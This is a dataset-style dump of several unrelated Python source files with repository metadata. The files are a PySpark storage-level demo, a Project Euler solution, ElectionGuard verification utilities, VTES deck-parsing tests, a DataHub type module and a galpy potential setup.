# # remove the username from the session if it's there
# session.pop('username', None)
# return redirect(url_for('index'))
if __name__ == "__main__":
app.run()
| 164 | 0 | 44 |
c98412ea0792f226057cb9e3d9d0d53f6b568adb | 1,039 | py | Python | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | #! encoding=utf8
# To decide the storage of RDD, there are different storage levels, which are given below -
# DISK_ONLY = StorageLevel(True, False, False, False, 1)
# DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
# MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_AND_DISK_SER = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_SER_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_ONLY = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
# MEMORY_ONLY_SER = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_SER_2 = StorageLevel(False, True, False, False, 2)
# OFF_HEAP = StorageLevel(True, True, True, False, 1)
from pyspark import SparkContext
import pyspark
sc = SparkContext (
"local",
"storagelevel app"
)
rdd1 = sc.parallelize([1,2])
rdd1.persist( pyspark.StorageLevel.MEMORY_AND_DISK_2 )
rdd1.getStorageLevel()
print(rdd1.getStorageLevel()) | 30.558824 | 91 | 0.741097 | #! encoding=utf8
# To decide the storage of RDD, there are different storage levels, which are given below -
# DISK_ONLY = StorageLevel(True, False, False, False, 1)
# DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
# MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_AND_DISK_SER = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_SER_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_ONLY = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
# MEMORY_ONLY_SER = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_SER_2 = StorageLevel(False, True, False, False, 2)
# OFF_HEAP = StorageLevel(True, True, True, False, 1)
from pyspark import SparkContext
import pyspark
sc = SparkContext (
"local",
"storagelevel app"
)
rdd1 = sc.parallelize([1,2])
rdd1.persist( pyspark.StorageLevel.MEMORY_AND_DISK_2 )
rdd1.getStorageLevel()
print(rdd1.getStorageLevel()) | 0 | 0 | 0 |
ffad4729a0ab2ddd177f2677d26fcdeafd55e261 | 1,504 | py | Python | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | # Soultion for Project Euler Problem #8 - https://projecteuler.net/problem=8
# (c) 2017 dpetker
TEST_VAL = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
curr_max = 0
for ctr in range(0, len(TEST_VAL) - 13):
temp_prod = multiply_range(TEST_VAL[ctr : ctr + 13])
if temp_prod > curr_max:
curr_max = temp_prod
print('The thirteen adjacent digits in the 1000-digit number that have the greatest product is {}'.format(curr_max))
| 71.619048 | 1,013 | 0.90359 | # Soultion for Project Euler Problem #8 - https://projecteuler.net/problem=8
# (c) 2017 dpetker
TEST_VAL = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
curr_max = 0
def multiply_range(test_str):
curr_prod = 1
for c in test_str:
curr_prod *= int(c)
return curr_prod
for ctr in range(0, len(TEST_VAL) - 13):
temp_prod = multiply_range(TEST_VAL[ctr : ctr + 13])
if temp_prod > curr_max:
curr_max = temp_prod
print('The thirteen adjacent digits in the 1000-digit number that have the greatest product is {}'.format(curr_max))
| 89 | 0 | 23 |
6eac3541878bf8483397909868c0b94d72499820 | 4,733 | py | Python | electionguard_verify/utils.py | nickboucher/PyVerify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | 1 | 2020-11-30T02:04:18.000Z | 2020-11-30T02:04:18.000Z | electionguard_verify/utils.py | nickboucher/electionguard-verify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | null | null | null | electionguard_verify/utils.py | nickboucher/electionguard-verify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | null | null | null | """ utils.py
Nicholas Boucher 2020
Utility functions for assisting in election verification
calculations.
"""
from typing import TypeVar, Iterable
from logging import info, warning
from electionguard.group import ElementModP, int_to_p
from electionguard.election import ElectionDescription, ContestDescription
from electionguard.ballot import CiphertextAcceptedBallot, CiphertextBallotContest, CiphertextBallotSelection
from electionguard.key_ceremony import CoefficientValidationSet
T: TypeVar = TypeVar('T')
class Invariants():
"""Represents a series of conditions that must all hold for the
collection of invariants to remain valid."""
title: str
conditions: dict[str, bool]
def __init__(self, title: str):
"""Instantiate a new set of invariants collectively labelled `title`."""
self.title = title
self.conditions = {}
def ensure(self, invariant: str, condition: bool) -> bool:
"""Track the truthiness of `condition` for the invariant labelled `invariant`."""
if invariant in self.conditions:
self.conditions[invariant] = self.conditions[invariant] and condition
else:
self.conditions[invariant] = condition
return condition
def validate(self) -> bool:
"""Return whether all conditions are valid, logging the results."""
validity: bool = True
error_msg: str = ''
for invariant, state in self.conditions.items():
validity = validity and state
if not state:
error_msg += f'\t\tFailed to validate invariant {invariant}.\n'
if validity:
info(f'[VALID]: {self.title}')
else:
info(f'[INVALID]: {self.title}')
info(error_msg)
return validity
class Contests():
"""Speeds up access to contest descriptions through object_id indexing."""
contests: dict[str,ContestDescription]
def __init__(self, description: ElectionDescription):
"""Indexes contest descriptions by object_id for quick lookups."""
self.contests = {}
for contest in description.contests:
self.contests[contest.object_id] = contest
def __getitem__(self, contest: str) -> ContestDescription:
"""Returns the requested contest, or None if no such contest exists."""
if contest in self.contests:
return self.contests[contest]
else:
return None
class Guardians():
"""Speeds up access to guardians through owner_id indexing."""
guardians: dict[str,CoefficientValidationSet]
def __init__(self, guardians: Iterable[CoefficientValidationSet]):
"""Indexes guardians by owner_id for quick lookups."""
self.guardians = {}
for guardian in guardians:
self.guardians[guardian.owner_id] = guardian
def __getitem__(self, guardian: str) -> ContestDescription:
"""Returns the requested guardian, or None if no such guardian exists."""
if guardian in self.guardians:
return self.guardians[guardian]
else:
return None
def get_first_el(els: list[T]) -> T:
"""Returns the first element of `els`, or None if it is empty."""
if len(els) > 0:
return els[0]
else:
return None
def get_contest(ballot: CiphertextAcceptedBallot, contest_id: str) -> CiphertextBallotContest:
"""Given a ballot, gets the supplied contest. If the contest appears more than once,
None is returned."""
result: CiphertextBallotContest = None
for contest in ballot.contests:
if contest.object_id == contest_id:
if result != None:
warn('Ballot contains multiple entries for the same contest.')
return None
else:
result = contest
return result
def get_selection(ballot: CiphertextAcceptedBallot, contest_id: str, selection_id: str) -> CiphertextBallotSelection:
"""Given a ballot, gets the supplied selection from within the supplied contest.
If the contest or selection appear more than once, None is returned."""
result: CiphertextBallotSelection = None
contest: CiphertextBallotContest = get_contest(ballot, contest_id)
if contest:
for selection in contest.ballot_selections:
if selection.object_id == selection_id:
if result != None:
warn('Ballot contains multiple entries for the same selection.')
return None
else:
result = selection
return result
def warn(msg: str) -> None:
"""Emits a warning message `msg` to the logs."""
warning(f'[WARNING]: {msg}') | 37.267717 | 117 | 0.654764 | """ utils.py
Nicholas Boucher 2020
Utility functions for assisting in election verification
calculations.
"""
from typing import TypeVar, Iterable
from logging import info, warning
from electionguard.group import ElementModP, int_to_p
from electionguard.election import ElectionDescription, ContestDescription
from electionguard.ballot import CiphertextAcceptedBallot, CiphertextBallotContest, CiphertextBallotSelection
from electionguard.key_ceremony import CoefficientValidationSet
T: TypeVar = TypeVar('T')
class Invariants():
"""Represents a series of conditions that must all hold for the
collection of invariants to remain valid."""
title: str
conditions: dict[str, bool]
def __init__(self, title: str):
"""Instantiate a new set of invariants collectively labelled `title`."""
self.title = title
self.conditions = {}
def ensure(self, invariant: str, condition: bool) -> bool:
"""Track the truthiness of `condition` for the invariant labelled `invariant`."""
if invariant in self.conditions:
self.conditions[invariant] = self.conditions[invariant] and condition
else:
self.conditions[invariant] = condition
return condition
def validate(self) -> bool:
"""Return whether all conditions are valid, logging the results."""
validity: bool = True
error_msg: str = ''
for invariant, state in self.conditions.items():
validity = validity and state
if not state:
error_msg += f'\t\tFailed to validate invariant {invariant}.\n'
if validity:
info(f'[VALID]: {self.title}')
else:
info(f'[INVALID]: {self.title}')
info(error_msg)
return validity
class Contests():
"""Speeds up access to contest descriptions through object_id indexing."""
contests: dict[str,ContestDescription]
def __init__(self, description: ElectionDescription):
"""Indexes contest descriptions by object_id for quick lookups."""
self.contests = {}
for contest in description.contests:
self.contests[contest.object_id] = contest
def __getitem__(self, contest: str) -> ContestDescription:
"""Returns the requested contest, or None if no such contest exists."""
if contest in self.contests:
return self.contests[contest]
else:
return None
class Guardians():
"""Speeds up access to guardians through owner_id indexing."""
guardians: dict[str,CoefficientValidationSet]
def __init__(self, guardians: Iterable[CoefficientValidationSet]):
"""Indexes guardians by owner_id for quick lookups."""
self.guardians = {}
for guardian in guardians:
self.guardians[guardian.owner_id] = guardian
def __getitem__(self, guardian: str) -> ContestDescription:
"""Returns the requested guardian, or None if no such guardian exists."""
if guardian in self.guardians:
return self.guardians[guardian]
else:
return None
def get_first_el(els: list[T]) -> T:
"""Returns the first element of `els`, or None if it is empty."""
if len(els) > 0:
return els[0]
else:
return None
def get_contest(ballot: CiphertextAcceptedBallot, contest_id: str) -> CiphertextBallotContest:
"""Given a ballot, gets the supplied contest. If the contest appears more than once,
None is returned."""
result: CiphertextBallotContest = None
for contest in ballot.contests:
if contest.object_id == contest_id:
if result != None:
warn('Ballot contains multiple entries for the same contest.')
return None
else:
result = contest
return result
def get_selection(ballot: CiphertextAcceptedBallot, contest_id: str, selection_id: str) -> CiphertextBallotSelection:
"""Given a ballot, gets the supplied selection from within the supplied contest.
If the contest or selection appear more than once, None is returned."""
result: CiphertextBallotSelection = None
contest: CiphertextBallotContest = get_contest(ballot, contest_id)
if contest:
for selection in contest.ballot_selections:
if selection.object_id == selection_id:
if result != None:
warn('Ballot contains multiple entries for the same selection.')
return None
else:
result = selection
return result
def warn(msg: str) -> None:
"""Emits a warning message `msg` to the logs."""
warning(f'[WARNING]: {msg}') | 0 | 0 | 0 |
911e3ee4e84c842b6e30a51754dbca2523df4215 | 8,608 | py | Python | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 6 | 2020-05-05T18:59:20.000Z | 2021-10-11T12:19:45.000Z | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 340 | 2020-04-15T08:19:29.000Z | 2022-03-31T09:59:19.000Z | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 8 | 2020-05-05T16:10:50.000Z | 2021-07-21T00:16:11.000Z | import os
from krcg import deck
from krcg import twda
| 28.693333 | 87 | 0.520214 | import os
from krcg import deck
from krcg import twda
def test_cards():
d = deck.Deck()
d.update({"Fame": 3})
assert list(d.cards()) == [("Fame", 3)]
def test_cards_count():
d = deck.Deck()
d.update({"Fame": 3, "Bum's Rush": 10, "Crusher": 4})
assert d.cards_count() == 17
def test_deck_display():
TWDA = twda._TWDA()
with open(os.path.join(os.path.dirname(__file__), "2010tcdbng.html")) as f:
TWDA.load_html(f)
assert len(TWDA) == 1
assert (
TWDA["2010tcdbng"].to_txt(format="twd")
== """Trading Card Day
Bad Naumheim, Germany
May 8th 2010
2R+F
10 players
Rudolf Scholz
-- 4vp in the final
Deck Name: The Storage Procurers
Description: Allies with Flash Grenades to keep troubles at bay.
Storage Annex for card efficiency and a structured hand. Weenies and
Midcaps with Obfuscate and/or Dominate to oust via Conditionings and
Deflections.
Crypt (12 cards, min=7, max=24, avg=3.75)
-----------------------------------------
1x Gilbert Duane 7 AUS DOM OBF prince Malkavian:1
1x Mariel, Lady Thunder 7 DOM OBF aus tha Malkavian:1
1x Badr al-Budur 5 OBF cel dom qui Banu Haqim:2
1x Count Ormonde 5 OBF dom pre ser Ministry:2
1x Didi Meyers 5 DOM aus cel obf Malkavian:1
1x Zebulon 5 OBF aus dom pro Malkavian:1
1x Dimple 2 obf Nosferatu:1
1x Mustafa Rahman 2 dom Tremere:2
1x Normal 2 obf Malkavian:1
1x Ohanna 2 dom Malkavian:2
1x Samson 2 dom Ventrue antitribu:2
1x Basil 1 obf Pander:2
Library (87 cards)
Master (19; 3 trifle)
1x Channel 10
2x Charisma
1x Creepshow Casino
1x KRCG News Radio
2x Perfectionist
6x Storage Annex -- great card! usually underestimated
3x Sudden Reversal
3x Vessel
Ally (12)
1x Carlton Van Wyk
1x Gregory Winter
1x Impundulu
1x Muddled Vampire Hunter
1x Ossian
6x Procurer
1x Young Bloods
Equipment (9)
1x Deer Rifle
8x Flash Grenade -- brings fear to the methuselahs rather than to minions
Action Modifier (19)
6x Cloak the Gathering
7x Conditioning -- should be more!
2x Lost in Crowds
4x Veil the Legions
Reaction (16)
7x Deflection
2x Delaying Tactics
7x On the Qui Vive
Combat (8)
8x Concealed Weapon
Event (4)
1x FBI Special Affairs Division
1x Hunger Moon
1x Restricted Vitae
1x Unmasking, The"""
)
assert (
TWDA["2010tcdbng"].to_txt(format="jol")
== """1x Gilbert Duane
1x Mariel, Lady Thunder
1x Badr al-Budur
1x Count Ormonde
1x Didi Meyers
1x Zebulon
1x Dimple
1x Mustafa Rahman
1x Normal
1x Ohanna
1x Samson
1x Basil
1x Channel 10
2x Charisma
1x Creepshow Casino
1x KRCG News Radio
2x Perfectionist
6x Storage Annex
3x Sudden Reversal
3x Vessel
1x Carlton Van Wyk
1x Gregory Winter
1x Impundulu
1x Muddled Vampire Hunter
1x Ossian
6x Procurer
1x Young Bloods
1x Deer Rifle
8x Flash Grenade
6x Cloak the Gathering
7x Conditioning
2x Lost in Crowds
4x Veil the Legions
7x Deflection
2x Delaying Tactics
7x On the Qui Vive
8x Concealed Weapon
1x FBI Special Affairs Division
1x Hunger Moon
1x Restricted Vitae
1x Unmasking, The"""
)
assert (
TWDA["2010tcdbng"].to_txt(format="lackey")
== """1 Channel 10
2 Charisma
1 Creepshow Casino
1 KRCG News Radio
2 Perfectionist
6 Storage Annex
3 Sudden Reversal
3 Vessel
1 Carlton Van Wyk
1 Gregory Winter
1 Impundulu
1 Muddled Vampire Hunter
1 Ossian
6 Procurer
1 Young Bloods
1 Deer Rifle
8 Flash Grenade
6 Cloak the Gathering
7 Conditioning
2 Lost in Crowds
4 Veil the Legions
7 Deflection
2 Delaying Tactics
7 On the Qui Vive
8 Concealed Weapon
1 FBI Special Affairs Division
1 Hunger Moon
1 Restricted Vitae
1 Unmasking, The
Crypt:
1 Gilbert Duane
1 Mariel, Lady Thunder
1 Badr al-Budur
1 Count Ormonde
1 Didi Meyers
1 Zebulon
1 Dimple
1 Mustafa Rahman
1 Normal
1 Ohanna
1 Samson
1 Basil"""
)
def test_from_amaranth():
d = deck.Deck.from_amaranth("4d3aa426-70da-44b7-8cb7-92377a1a0dbd")
assert d.to_json() == {
"id": "4d3aa426-70da-44b7-8cb7-92377a1a0dbd",
"date": "2020-12-28",
"name": "First Blood: Tremere",
"author": "BCP",
"comments": (
"https://blackchantry.com/"
"How%20to%20play%20the%20First%20Blood%20Tremere%20deck.pdf"
),
"crypt": {
"count": 12,
"cards": [
{"id": 201020, "count": 2, "name": "Muhsin Samir"},
{"id": 201213, "count": 2, "name": "Rutor"},
{"id": 201388, "count": 2, "name": "Troius"},
{"id": 201501, "count": 2, "name": "Zane"},
{"id": 200025, "count": 2, "name": "Aidan Lyle"},
{"id": 200280, "count": 2, "name": "Claus Wegener"},
],
},
"library": {
"count": 86,
"cards": [
{
"type": "Master",
"count": 9,
"cards": [
{"id": 100015, "count": 1, "name": "Academic Hunting Ground"},
{"id": 100081, "count": 1, "name": "Arcane Library"},
{"id": 100199, "count": 4, "name": "Blood Doll"},
{"id": 100329, "count": 1, "name": "Chantry"},
{"id": 102092, "count": 2, "name": "Vast Wealth"},
],
},
{
"type": "Action",
"count": 12,
"cards": [
{"id": 100845, "count": 12, "name": "Govern the Unaligned"}
],
},
{
"type": "Ally",
"count": 1,
"cards": [{"id": 101963, "count": 1, "name": "Thadius Zho"}],
},
{
"type": "Equipment",
"count": 7,
"cards": [
{"id": 100001, "count": 4, "name": ".44 Magnum"},
{"id": 101014, "count": 1, "name": "Ivory Bow"},
{"id": 101856, "count": 2, "name": "Sport Bike"},
],
},
{
"type": "Retainer",
"count": 1,
"cards": [{"id": 100335, "count": 1, "name": "Charnas the Imp"}],
},
{
"type": "Action Modifier",
"count": 6,
"cards": [{"id": 100236, "count": 6, "name": "Bonding"}],
},
{
"type": "Reaction",
"count": 30,
"cards": [
{"id": 100644, "count": 4, "name": "Enhanced Senses"},
{"id": 100760, "count": 5, "name": "Forced Awakening"},
{"id": 101321, "count": 5, "name": "On the Qui Vive"},
{"id": 101475, "count": 4, "name": "Precognition"},
{"id": 101850, "count": 4, "name": "Spirit's Touch"},
{"id": 101949, "count": 8, "name": "Telepathic Misdirection"},
],
},
{
"type": "Combat",
"count": 20,
"cards": [
{"id": 100077, "count": 8, "name": "Apportation"},
{"id": 101966, "count": 10, "name": "Theft of Vitae"},
{"id": 102139, "count": 2, "name": "Walk of Flame"},
],
},
],
},
}
def test_deck_to_vdb():
TWDA = twda._TWDA()
with open(os.path.join(os.path.dirname(__file__), "2010tcdbng.html")) as f:
TWDA.load_html(f)
assert len(TWDA) == 1
assert TWDA["2010tcdbng"].to_vdb() == (
"https://vdb.smeea.casa/decks?name=The+Storage+Procurers&author=Rudolf+Scholz#"
"200517=1;200929=1;200161=1;200295=1;200343=1;201503=1;200346=1;201027=1;"
"201065=1;201073=1;201231=1;200173=1;100327=1;100332=2;100444=1;101067=1;"
"101388=2;101877=6;101896=3;102113=3;100298=1;100855=1;100966=1;101250=1;"
"101333=1;101491=6;102202=1;100516=1;100745=8;100362=6;100401=7;101125=2;"
"102097=4;100518=7;100519=2;101321=7;100392=8;100709=1;100944=1;101614=1;"
"102079=1"
)
| 8,433 | 0 | 115 |
0c3e2c67bfe44f727a088c6f877154b8fbe9995e | 8,453 | py | Python | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
import time
import datetime
import decimal
from ..thirdparty import six
from .. import utils
class DataType(object):
"""
Abstract data type
"""
_singleton = True
__slots__ = 'nullable',
@property
# Bigint
# Double
# String
#Timestamp
# Boolean
bigint = Bigint()
double = Double()
string = String()
timestamp = Timestamp()
boolean = Boolean()
_datahub_primitive_data_types = dict(
[(t.name, t) for t in (
bigint, double, string, timestamp, boolean
)]
)
integer_builtins = six.integer_types
float_builtins = (float,)
try:
import numpy as np
integer_builtins += (np.integer,)
float_builtins += (np.float,)
except ImportError:
pass
_datahub_primitive_to_builtin_types = {
bigint: integer_builtins,
double: float_builtins,
string: six.string_types,
timestamp: integer_builtins,
boolean: bool
}
| 28.176667 | 95 | 0.659293 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
import time
import datetime
import decimal
from ..thirdparty import six
from .. import utils
class DataType(object):
"""
Abstract data type
"""
_singleton = True
__slots__ = 'nullable',
def __new__(cls, *args, **kwargs):
if cls._singleton:
if not hasattr(cls, '_instance'):
cls._instance = object.__new__(cls)
cls._hash = hash(cls)
return cls._instance
else:
return object.__new__(cls)
def __init__(self, nullable=True):
self.nullable = nullable
def __call__(self, nullable=True):
return self._factory(nullable=nullable)
def _factory(self, nullable=True):
return type(self)(nullable=nullable)
def __ne__(self, other):
return not (self == other)
def __eq__(self, other):
return self._equals(other)
def _equals(self, other):
if self is other:
return True
other = validate_data_type(other)
if self.nullable != other.nullable:
return False
if type(self) == type(other):
return True
return isinstance(other, type(self))
def __hash__(self):
return self._hash
@property
def name(self):
return type(self).__name__.lower()
def __repr__(self):
if self.nullable:
return self.name
return '{0}[non-nullable]'.format(self.name)
def __str__(self):
return self.name.upper()
def can_implicit_cast(self, other):
if isinstance(other, six.string_types):
other = validate_data_type(other)
return isinstance(self, type(other))
def can_explicit_cast(self, other):
return self.can_implicit_cast(other)
def validate_value(self, val):
# directly return True means without checking
return True
def _can_cast_or_throw(self, value, data_type):
if not self.can_implicit_cast(data_type):
raise ValueError('Cannot cast value(%s) from type(%s) to type(%s)' % (
value, data_type, self))
def cast_value(self, value, data_type):
raise NotImplementedError
class DatahubPrimitive(DataType):
__slots__ = ()
# Bigint
class Bigint(DatahubPrimitive):
__slots__ = ()
_bounds = (-9223372036854775808, 9223372036854775807)
def can_implicit_cast(self, other):
if isinstance(other, six.string_types):
other = validate_data_type(other)
if isinstance(other, (Double, String, Timestamp)):
return True
return super(Bigint, self).can_implicit_cast(other)
def validate_value(self, val):
if val is None and self.nullable:
return True
smallest, largest = self._bounds
if smallest <= val <= largest:
return True
raise ValueError('InvalidData: Bigint(%s) out of range' % val)
def cast_value(self, value, data_type):
self._can_cast_or_throw(value, data_type)
return int(value)
# Double
class Double(DatahubPrimitive):
__slots__ = ()
def can_implicit_cast(self, other):
if isinstance(other, six.string_types):
other = validate_data_type(other)
if isinstance(other, (Bigint, String)):
return True
return super(Double, self).can_implicit_cast(other)
def cast_value(self, value, data_type):
self._can_cast_or_throw(value, data_type)
return float(value)
# String
class String(DatahubPrimitive):
__slots__ = ()
_max_length = 1 * 1024 * 1024 # 1M
def can_implicit_cast(self, other):
if isinstance(other, six.string_types):
other = validate_data_type(other)
if isinstance(other, (Bigint, Double, Timestamp)):
return True
return super(String, self).can_implicit_cast(other)
def validate_value(self, val):
if val is None and self.nullable:
return True
if len(val) <= self._max_length:
return True
raise ValueError("InvalidData: Length of string(%s) is more than 1M.'" % val)
def cast_value(self, value, data_type):
self._can_cast_or_throw(value, data_type)
val = utils.to_text(value)
return val
#Timestamp
class Timestamp(DatahubPrimitive):
__slots__ = ()
_ticks_bound = (-62135798400000000,253402271999000000)
def can_implicit_cast(self, other):
if isinstance(other, six.string_types):
other = validate_data_type(other)
if isinstance(other, String):
return True
return super(Timestamp, self).can_implicit_cast(other)
def validate_value(self, val):
if val is None and self.nullable:
return True
smallest, largest = self._ticks_bound
if smallest <= val <= largest:
return True
raise ValueError('InvalidData: Timestamp(%s) out of range' % val)
def cast_value(self, value, data_type):
self._can_cast_or_throw(value, data_type)
return int(value)
# Boolean
class Boolean(DatahubPrimitive):
__slots__ = ()
def cast_value(self, value, data_type):
if isinstance(data_type, six.string_types):
data_type = validate_data_type(data_type)
if isinstance(data_type, String):
if 'true' == value.lower():
return True
elif 'false' == value.lower():
return False
self._can_cast_or_throw(value, data_type)
return value
bigint = Bigint()
double = Double()
string = String()
timestamp = Timestamp()
boolean = Boolean()
_datahub_primitive_data_types = dict(
[(t.name, t) for t in (
bigint, double, string, timestamp, boolean
)]
)
def validate_data_type(data_type):
if isinstance(data_type, DataType):
return data_type
if isinstance(data_type, six.string_types):
data_type = data_type.lower()
if data_type in _datahub_primitive_data_types:
return _datahub_primitive_data_types[data_type]
raise ValueError('Invalid data type: %s' % repr(data_type))
integer_builtins = six.integer_types
float_builtins = (float,)
try:
import numpy as np
integer_builtins += (np.integer,)
float_builtins += (np.float,)
except ImportError:
pass
_datahub_primitive_to_builtin_types = {
bigint: integer_builtins,
double: float_builtins,
string: six.string_types,
timestamp: integer_builtins,
boolean: bool
}
def infer_primitive_data_type(value):
for data_type, builtin_types in six.iteritems(_datahub_primitive_to_builtin_types):
if isinstance(value, builtin_types):
return data_type
def _validate_primitive_value(value, data_type):
if value is None:
return None
if isinstance(value, (bytearray, six.binary_type)):
value = value.decode('utf-8')
builtin_types = _datahub_primitive_to_builtin_types[data_type]
if isinstance(value, builtin_types):
return value
inferred_data_type = infer_primitive_data_type(value)
if inferred_data_type is None:
raise ValueError(
'Unknown value type, cannot infer from value: %s, type: %s' % (value, type(value)))
return data_type.cast_value(value, inferred_data_type)
def validate_value(value, data_type):
if data_type in _datahub_primitive_to_builtin_types:
res = _validate_primitive_value(value, data_type)
else:
raise ValueError('Unknown data type: %s' % data_type)
data_type.validate_value(res)
return res
| 5,369 | 664 | 656 |
9716ba57dde39ce137fcb1254e0cd19d311a0194 | 17,674 | py | Python | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | 3 | 2020-09-27T16:22:36.000Z | 2022-03-23T22:00:55.000Z | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | null | null | null | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | 1 | 2020-09-27T16:22:42.000Z | 2020-09-27T16:22:42.000Z | #purpose: to take output from a MW@h .out file and produce workable data/plots to look at the resulting output in meaningful ways
#this is still too hard-coded for my liking, but it'll have to do for now
#i.e. if you want to add new attributes to the data class then you manually have to go through and fix the appending functions
import matplotlib.pyplot as plt
import numpy as np
import coord_trans as ct
import astropy
from astropy.coordinates import SkyCoord
import astropy.units as u
import random
import galpy
from galpy.orbit import Orbit
from galpy.potential import HernquistPotential
from galpy.potential import LogarithmicHaloPotential
from galpy.potential import MiyamotoNagaiPotential
from galpy.potential import PlummerPotential
m_bulge = 3.4e10*u.solMass #solar masses
m_disk = 1.0e11*u.solMass
v_halo = 74.61*u.km/u.s #km/s
G = 6.67e-11*u.m**3/(u.kg*u.s**2)
pot_bulge = HernquistPotential(amp=2*m_bulge, a=0.7*u.kpc, ro=8., vo=220.)
pot_disk = MiyamotoNagaiPotential(amp=G*m_disk, a=6.5*u.kpc, b=0.26*u.kpc, ro=8., vo=220.)
pot_halo = LogarithmicHaloPotential(amp=2*v_halo**2, q=1., core=12.0*u.kpc, ro=8., vo=220.)
pot = [pot_bulge, pot_disk, pot_halo]
m_plummer = 1e9*u.solMass
r_scale_plummer = 3*u.kpc
plummer_pot = PlummerPotential(amp=G*m_plummer, b=r_scale_plummer, ro=10*u.kpc, vo=20*u.km/u.s)
struct_to_sol = 222288.47 #this many solar masses make up one structural nass unit (the output of mwah)
